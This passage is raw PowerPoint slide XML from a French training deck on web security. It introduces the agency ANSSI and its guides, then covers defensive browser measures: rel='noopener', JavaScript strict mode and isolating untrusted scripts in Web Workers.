          <a:xfrm>
            <a:off x="6238379" y="605183"/>
            <a:ext cx="5503047" cy="5645613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19892091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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’ANSSI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="ZoneTexte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BF495C0-D1A0-490D-8DF1-0A68F9C5AB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1528550"/>
            <a:ext cx="10438490" cy="4985980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="49000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>l'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ANSSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Agence nationale de la sécurité des systèmes d’information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) apporte son expertise et son assistance technique aux administrations, aux entreprises et aux particuliers avec une mission renforcée au profit des opérateurs d'importance vitale (OIV).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Elle assure un service de veille, de détection, d'alerte et de réaction aux attaques informatiques.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.ssi.gouv.fr/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recommandations pour la mise en œuvre d’un site web :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.ssi.gouv.fr/uploads/2013/05/anssi-guide-recommandations_mise_en_oeuvre_site_web_maitriser_standards_securite_cote_navigateur-v2.0.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.ssi.gouv.fr/uploads/IMG/pdf/NP_Securite_Web_NoteTech.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2714638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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>HTML et JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8655F06-EC0F-49F4-923C-4C95758D8FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1704966"/>
            <a:ext cx="10603381" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="61000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il est recommandé de sécuriser systématiquement l’ouverture de nouvelles fenêtres : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ en HTML par l’utilisation de l’attribut rel="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>noopener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" dès lors que l’attribut </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> est utilisé pour un lien ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ en JavaScript par l’utilisation de l’option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>noopener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> dès lors que le second paramètre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> est utilisé dans la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6046AA06-79ED-4326-8DF1-1E45212216C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365401" y="3610563"/>
            <a:ext cx="9461197" cy="292340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34DCE19-5807-4A59-81C0-677DE8740F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365401" y="4061117"/>
            <a:ext cx="5933154" cy="1649417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2448DF0-10F8-4C65-9682-ABBB7235152F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="5906954"/>
            <a:ext cx="10705449" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La valeur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>noopener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> de l’attribut de relation rel a été introduite pour empêcher toute communication avec la page appelante.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5255604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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>HTML et JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8655F06-EC0F-49F4-923C-4C95758D8FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684210" y="1834463"/>
            <a:ext cx="10603381" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le mode strict de JavaScript permet de désactiver certains comportements jugés trop souples lors de l’interprétation, dans des domaines tels que la syntaxe ou encore les types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ce mode se déclare au niveau d’un fichier ou au niveau d’une fonction par l’ajout de la chaîne de caractères "use strict";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC874EC2-8583-4FD7-AF20-22EB01C62E91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387448" y="3609170"/>
            <a:ext cx="5137776" cy="2758175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372805078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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cloisonnement JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8655F06-EC0F-49F4-923C-4C95758D8FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1698278"/>
            <a:ext cx="4219033" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les traitements utilisant des ressources JavaScript non maîtrisées, externes au site ou des appels CORS doivent si possible être isolés dans des Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Workers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> afin d’empêcher leurs accès aux DOM et de réduire leur impact sur le fil d’exécution principal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Workers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> constituent un élément important de défense en permettant le confinement de code JavaScript dans un contexte dédié, sans accès au DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7593593-45C3-4919-9C86-EACB7CB4F635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6903773" y="1435769"/>
            <a:ext cx="4801270" cy="600159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D2A62FB-BB9A-4DBE-8C58-C7ED6D6F3067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903244" y="2140330"/>
            <a:ext cx="6801799" cy="2762636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD35D4AD-F454-40C2-BDBF-3975FC0C1993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5579613" y="4957385"/>
            <a:ext cx="6125430" cy="1495634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184247434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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cloisonnement JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
